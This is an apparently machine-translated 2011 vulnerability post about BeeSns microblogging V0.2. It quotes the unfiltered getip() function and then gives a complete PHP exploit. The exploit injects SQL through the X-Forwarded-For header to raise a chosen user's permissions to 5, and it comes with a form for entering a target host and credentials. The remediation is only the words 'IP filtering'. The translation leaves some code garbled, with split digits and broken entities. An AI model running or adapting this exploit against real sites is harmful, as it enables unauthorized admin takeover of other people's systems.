BeeSns microblogging system V0. 2 elevation of Privilege oday+exp and fix-vulnerability warning-the black bar safety net

2011-02-04T00:00:00
ID MYHACK58:62201128987
Type myhack58
Reporter 佚名
Modified 2011-02-04T00:00:00

Description

|

Publishing author: sub-meter Affected versions: BeeSns V0. 2 Official address: <http://www.beesns.com/> Vulnerabilitydescription: IP filter is not strict,causing the user can submit malicious parameters to enhance their own privileges

This microblogging system style nice, personally prefer, the look code is found some problems, looking directly at the code.

0 1 // Get Client IP

0 2 functiongetip() {

0 3 if(isset($_SERVER)) {

0 4 if(isset($_SERVER[HTTP_X_FORWARDED_FOR])) {

0 5 $realip= $_SERVER[HTTP_X_FORWARDED_FOR];

0 6 } elseif(isset($_SERVER[HTTP_CLIENT_IP])) {

0 7 $realip= $_SERVER[HTTP_CLIENT_IP];

0 8 } else{

0 9 $realip= $_SERVER[REMOTE_ADDR];

1 0 }

1 1 } else{

1 2 if(getenv("HTTP_X_FORWARDED_FOR")) {

1 3 $realip= getenv( "HTTP_X_FORWARDED_FOR");

1 4 } elseif(getenv("HTTP_CLIENT_IP")) {

1 5 $realip= getenv("HTTP_CLIENT_IP");

1 6 } else{

1 7 $realip= getenv("REMOTE_ADDR");

1 8 }

1 9 }

2 0 $iphide=explode(".",$ realip);

2 1

2 2 $realip="$iphide[0].$ iphide[1].$ iphide[2].$ iphide[3]";//! I don't understand the author to write God horse stuff, IP no filter, thevulnerabilityto produce

2 3 return$realip;

2 4 }

Oldvulnerability, purely YY. - - it!

EXP: the

0 1 <? php

0 2 print_r('

0 3 +---------------------------------------------------------------------------+<br>

0 4 BeeSns v0. 2 Getip() Remote SQL Injection Exploit<br>

0 5 site:www.beesns.com <br>

0 6 by the sub-meter<br>

0 7 Blog: http://www.zyday.com <br>

0 8

0 9 +---------------------------------------------------------------------------+<br>');

1 0

1 1 if(empty($_POST[submit])) {

1 2 }else{

1 3 error_reporting(7);

1 4 ini_set('max_execution_time', 0);

1 5 $host= $_POST[host];

1 6 $path= $_POST[path];

1 7 $username= $_POST[username];

1 8 $password= $_POST[password];

1 9 send();

2 0 }

2 1 <!-- more-->

2 2

2 3 functionsend()

2 4 {

2 5 global$host, $path,$username,$password;

2 6

2 7 $cmd= "uId=".$ username."& amp;uPw=".$ password;

2 8 $getinj="1.1.1.1',permissions=5 where uid='$username'#";

2 9 $data= "POST ".$ path."post. php? act= 'userLogin' HTTP/1.1\r\n";

3 0 $data.= "Accept: /\r\n";

3 1 $data.= "Accept-Language: zh-cn\r\n";

3 2 $data.= "Content-Type: application/x-www-form-urlencoded\r\n";

3 3 $data.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

3 4 $data.= "Host: $host\r\n";

3 5 $data.= "Content-Length: ". strlen($cmd)."\ r\n";

3 6 $data.= "Connection: Close\r\n";

3 7 $data.= "X-Forwarded-For: $getinj\r\n\r\n";

3 8 $data.= $cmd;

3 9

4 0 $fp= fsockopen($host, 8 0);

4 1 fputs($fp, $data);

4 2

4 3 $resp= ";

4 4

4 5 while($fp&& ! feof($fp))

4 6 $resp.= fread($fp, 1 0 2 4);

4 7

4 8 if(preg_match('#(.) charset=utf-8(.) 1(.) 1(.) 0(.*)# Uis',$resp)){

4 9 echo"<br><font color='green'>elevated success!& lt;/font>";

5 0 }else{

5 1 echo"<font color='red'>Failed!& lt;/font>";

5 2 }

5 3

5 4 }

5 5 ?& gt;

5 6 <form action="method='POST'>

5 7 Target Address:<input type='input'name='host'value='www.zyday.com'>*please do not add<a href="http://%3cbr/">http://<br</a>>

5 8 two directories:<input type='input'name='path'value='/'>*if instead the two directories, please keep the default<br>

5 of 9 user name:<input type='input'name='username'>*you are at the target Station application. username<font color='red'>suggestions with a small test</font><br>

6 0 password:<input type='input'name='password'><br>

6 1 <input type='submit'name='submit'value='elevation of Privilege'><br>

6 2 </form>

Fix: IP filtering